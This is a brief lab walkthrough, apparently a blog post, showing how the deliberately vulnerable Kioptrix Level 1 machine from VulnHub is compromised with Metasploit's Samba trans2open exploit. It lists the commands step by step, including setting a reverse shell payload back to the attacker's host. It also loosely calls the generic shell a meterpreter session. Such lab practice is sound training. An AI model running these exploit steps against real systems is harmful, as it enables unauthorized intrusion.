WalkThrough! Kioptrix — 1 (Part 2) By VulnHub
Hi,
I hope the first WalkThrough of Kioptrix-1 was easy and fun to read. Here is the second part of it.
After successfully exploiting the Kioptrix Level 1 machine using the Samba exploit. I moved forward to look for its exploitation using metasploit. Firstly i looked for the samba exploits using the search command and found multiple exploits for it. As i knew it’s running on Reh-Hat linux so the linux exploit is the right one.
search samba
Then i used this exploit by using the command and hit options command for the requirements;
use exploit/linux/samba/trans2open
show options
After this i set the RHOST to the target IP address and looked for available payloads for reverse meterpreter connection.
set RHOST 192.168.97.133
show payloads
set PAYLOAD generic/shell_reverse_tcp
After this i had to set the LHOST for the reverse connection So;
set LHOST <Our IP>
exploit
At the end after running the exploit command i gained the meterpreter session and now i was able to interact with the Kioptrix Machine.
That’s how i exploited it using the Metasploit.
Thanks for reading.
Best Regards,
Kamran Saifullah